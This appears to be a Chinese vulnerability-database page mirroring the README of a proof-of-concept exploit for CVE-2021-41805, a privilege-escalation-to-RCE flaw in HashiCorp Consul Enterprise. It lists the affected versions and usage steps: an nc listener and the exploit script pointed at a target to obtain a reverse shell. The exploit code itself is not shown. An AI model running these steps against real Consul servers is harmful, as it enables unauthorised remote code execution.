POC详情: e5578d88836796a02dbc2a0e093346110c1f9243

来源
关联漏洞
标题: Hashicorp HashiCorp Consul 安全漏洞 (CVE-2021-41805)
描述:Hashicorp HashiCorp Consul是美国HashiCorp(Hashicorp)公司的一套分布式、高可用数据中心感知解决方案。该产品用于跨动态分布式基础架构连接和配置应用程序。 HashiCorp Consul Enterprise 存在安全漏洞,攻击者可以利用该漏洞提升权限。以下产品及版本受到影响:HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4。
描述
A proof-of-concept for CVE-2021-41805 which is a vulnerability in HashiCorp Consul Enterprise allowing for Remote Code Execution (RCE).
介绍
# CVE-2021-41805 - HashiCorp Consul Enterprise RCE

> [!WARNING]
> LEGAL DISCLAIMER:
> This tool is STRICTLY for EDUCATIONAL PURPOSES ONLY!
> Usage of this tool for attacking targets without prior mutual consent is ILLEGAL.
> It is the user's responsibility to obey all laws that apply whilst using this tool.
> The developer of this tool assumes no liability and is not responsible for any misuse
> or damage caused by this program.

## About the CVE
An **ACL token** (with the default **operator:write** permissions) in one namespace can be used for unintended privilege escalation in a different namespace. This can be abused to gain **Remote Code Execution (RCE)** with escalated privileges.

## Affected Versions
- < 1.8.17
- 1.9.x < 1.9.11
- 1.10.x < 1.10.4

## Installing and Running the Script
- First, clone the repository:\
`git clone https://github.com/acfirthh/CVE-2021-41805.git`
- Change directory into the cloned repository:\
`cd CVE-2021-41805`
- Start a simple listener:\
`nc -nvlp <LISTENER_PORT>`
- Run the script:\
`python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]`

![Reverse Shell](images/reverse_shell.png)

## Expected Output
Running the exploit with the basic arguments: **-r [TARGET_IP]**, **-rp [TARGET_PORT]**, **-l [LISTENER_IP]**, **-lp [LISTENER_PORT]** (**-t [ACL_TOKEN]**, **-s [Use SSL]**) will give basic output like:\
```
[*] The PUT request was made successfully. Check your listener...
```

Running the exploit with the basic arguments plus **-v [VERBOSE]** will give verbose output:\
![Verbose Output](images/verbose_output.png)

If an error occurs when the exploit is run and the **-v** argument is specified, the output will be something like:\
![Verbose Output with Error](images/verbose_output_error.png)
文件快照

[4.0K] /data/pocs/e5578d88836796a02dbc2a0e093346110c1f9243 ├── [2.8K] CVE-2021-41805.py ├── [4.0K] images │   ├── [ 14K] reverse_shell.png │   ├── [ 50K] verbose_output_error.png │   └── [ 32K] verbose_output.png ├── [ 34K] LICENSE └── [1.8K] README.md 1 directory, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。